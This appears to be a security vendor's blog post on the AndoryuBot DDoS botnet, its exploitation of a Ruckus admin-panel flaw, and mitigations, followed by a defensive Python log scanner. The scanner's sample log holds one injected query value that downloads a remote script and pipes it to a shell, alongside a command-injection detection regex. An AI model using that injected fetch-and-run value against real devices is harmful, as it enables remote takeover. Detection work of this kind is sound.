“AndoryuBot,” a new malware, is attempting to infect unpatched Wi-Fi access points for use in DDoS attacks by exploiting a critical-severity flaw in the Ruckus Wireless Admin panel. The flaw, CVE-2023-25717, affects all Ruckus Wireless Admin panels version 10.4 and older, and allows remote threat operators to execute code by submitting unauthenticated HTTP GET requests to vulnerable devices. The flaw was detected and fixed on February 8, 2023. However, many device owners have yet to apply the available security updates, and end-of-life models affected by the security problem won’t receive a patch. AndoryuBot first appeared in the wild in February 2023, and one cybersecurity company reports that a newer version targeting Ruckus devices appeared in mid-April. The botnet malware aims to recruit vulnerable devices into its DDoS (distributed denial of service) swarm, which its operators run for profit.
The malware infects victims’ vulnerable devices through malicious HTTP GET requests, then downloads an additional script from a hardcoded URL for further propagation. The cybersecurity company analyzing the variant explains that the malware can target various system architectures, including x86, arm, SPC, m68k, mips, sh4, and mpsl. After infecting a device, the malware establishes a connection with the C2 server using SOCKS proxying, both for stealth and to evade firewalls, and then waits for commands.
AndoryuBot malware supports the following DDoS attack modes: tcp-raw, tcp-socket, tcp-cnc, tcp-handshake, udp-plain, udp-game, udp-ovh, udp-raw, udp-dstat, udp-bypass, and icmp-echo. The malware receives a directive from the command-and-control server indicating the type of DDoS, the target IP address, and the port number to attack. The malware’s operators rent out the botnet’s firepower to other cybercriminals looking to execute DDoS attacks. They accept cryptocurrency payments, including XMR, BTC, ETH, USDT, and CashApp, for their services. Weekly rental prices range from $20 for a single-connection 90-second attack launched 50 times per day using all available bots to $115 for a double-connection 200-second attack launched 100 times daily utilizing all known bots. The Andoryu project is being promoted in YouTube videos in which the operators demonstrate the botnet’s capabilities. To prevent botnet malware attacks, companies need to apply available firmware updates, use strong device administrator passwords, and disable remote admin panel access if it is not required.
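Two of the warning signs described above (the admin panel being reachable from outside the management network, and unauthenticated GET requests carrying shell metacharacters that would fetch a follow-on script) can be checked against web access logs. The following is an added example written for this article, not code from SpearTip or from any analysis of the malware; the log format, the `/admin/` path prefix, the `10.10.0.0/24` management subnet and the sample lines are all constructed assumptions, and the real Ruckus endpoint is deliberately not used.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed sample lines in a combined-log-style format (assumed; a real
# Ruckus AP log will differ). The second line imitates an injected query string.
SAMPLE_LOG = """\
10.10.0.5 - admin [05/May/2023:10:01:12 +0000] "GET /admin/status HTTP/1.1" 200 512
203.0.113.9 - - [05/May/2023:10:02:44 +0000] "GET /admin/login?user=a&pass=x%3Bcurl%20http%3A%2F%2F198.51.100.7%2Fx.sh%7Csh HTTP/1.1" 200 0
198.51.100.3 - - [05/May/2023:10:03:01 +0000] "GET /index.html HTTP/1.1" 200 1024
10.10.0.7 - - [05/May/2023:10:04:09 +0000] "GET /admin/login?user=admin&pass=secret HTTP/1.1" 200 300
"""

LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \d+')
ADMIN_PREFIX = "/admin/"                           # assumed admin-panel path prefix
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")    # assumed management subnet
SHELL_META = re.compile(r"[;|`]|\$\(")             # metacharacters typical of command injection

def analyze(log_text):
    """Return a list of (source_ip, reasons) for admin-panel GETs that merit review."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, user, method, target, status = m.groups()
        if method != "GET" or not target.startswith(ADMIN_PREFIX):
            continue
        reasons = []
        if ipaddress.ip_address(src) not in MGMT_NET:
            reasons.append("admin panel reached from outside the management network")
        decoded = unquote(unquote(target))         # decode twice: payloads are often double-encoded
        if "?" in decoded and SHELL_META.search(decoded.split("?", 1)[1]):
            reasons.append("shell metacharacters in query string")
        if user == "-" and reasons:
            reasons.append("request carried no authenticated user")
        if reasons:
            findings.append((src, reasons))
    return findings

if __name__ == "__main__":
    for src, reasons in analyze(SAMPLE_LOG):
        print(src, "->", "; ".join(reasons))
```

On the sample input only the request from 203.0.113.9 is reported; the in-network administrator login with ordinary parameters is left alone.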
With threat groups developing and using new tactics and techniques, including DDoS botnet malware, to exploit vulnerabilities in software and networks, companies need to stay vigilant about the current threat landscape and regularly update their software. At SpearTip, our network vulnerability assessments are an essential part of the risk management process. They should be conducted periodically to ensure devices on companies’ networks are not exposed to known vulnerabilities. We comprehensively identify, classify, and analyze known and potential vulnerabilities, then provide actionable solutions to eliminate future cybersecurity problems. Our gap analysis allows our engineers to discover blind spots within companies by comparing technology and internal personnel that could lead to significant compromises. Our engineers go beyond simple compliance frameworks and examine the day-to-day function of cybersecurity within companies. This leads to critical recommendations by exposing vulnerabilities in software as well as in people and processes. Identifying technical vulnerabilities inside and outside the organization provides deeper context for potential environmental gaps.
If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.